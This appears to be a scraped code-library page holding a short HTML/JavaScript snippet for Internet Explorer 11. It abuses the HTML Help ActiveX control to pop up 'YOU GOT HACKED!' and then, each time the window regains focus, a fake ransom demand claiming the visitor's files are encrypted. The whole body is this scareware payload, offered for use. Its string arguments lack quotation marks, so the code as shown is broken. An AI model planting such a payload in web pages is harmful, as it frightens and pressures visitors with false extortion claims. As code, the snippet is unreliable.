首页 > 代码库 > IE11 HTML Help ActiveX

IE11 HTML Help ActiveX

<!--by: @qab-->
<OBJECT
id=HHCTRL type="application/x-oleobject"
classid="clsid:52a2aaae-085d-4187-97ea-8c30db990436" >
</OBJECT>


<script>
setTimeout(function(){
HHCTRL.TextPopup(YOU GOT HACKED!,"MS Sans Serif, 101, , BOLD",99,99,111,1)//<-- last ints are width,height,textColor,bgColor
},500);
window.onfocus=function(){

setTimeout(function(){
HHCTRL.TextPopup(YOU CANNOT ESCAPE!\nAll your files have been base64 encrypted\n$1bn or deleted!,"MS Sans Serif, 101, , BOLD",199,199,111,1)
},11);
}
</script>

 

IE11 HTML Help ActiveX